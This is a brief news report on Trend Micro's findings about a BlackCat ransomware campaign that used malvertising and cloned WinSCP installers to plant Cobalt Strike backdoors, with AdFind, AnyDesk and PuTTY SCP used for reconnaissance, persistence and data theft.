The BlackCat ransomware-as-a-service group has been discovered developing a threat activity cluster by utilizing selected keywords on legitimate organizations’ webpages to deploy malicious malware.
Researchers from Trend Micro, along with an unnamed organization, uncovered unauthorized activities performed by cybercriminals within the company’s network, involving cloned webpages of WinSCP and SpyBoy.
This technique, known as malvertising, involves hijacking keywords to display malicious ads that lure unsuspecting users into downloading malware. The attackers managed to steal top-level administrator privileges and attempted to establish backdoor access and persistence using remote management tools.
Researchers noted similarities between this campaign and previous ones conducted by BlackCat, including the use of anti-antivirus and anti-endpoint detection tools like SpyBoy to tamper with agent protection.
To exfiltrate the stolen data, the attackers employed the PuTTY Secure Copy client for information transfer. Further investigation into the command and control domains used by the threat actor revealed a potential connection with the Clop ransomware.
The attack chain involved SEO-poisoning techniques to deceive unsuspecting users into downloading a cloned application containing malware. The infection flow included the delivery of an initial loader, fetching the bot core, and ultimately dropping the payload, typically a backdoor. In this case, the WinSCP application contained a backdoor with Cobalt Strike Beacon, enabling operations on a remote server.
In addition to these tools, the researchers identified the use of AdFind by the threat actors, which is designed to retrieve and display information from Active Directory environments. When in the hands of a threat actor, AdFind can be exploited for activities such as user account enumeration, privilege escalation, and password hash extraction.
The malicious actors also employed the AnyDesk remote management tool within the environment to maintain persistence. The discovery of these unauthorized activities highlights the ongoing efforts of cybercriminals to exploit legitimate organizations and underscores the importance of robust cybersecurity measures to mitigate such threats.
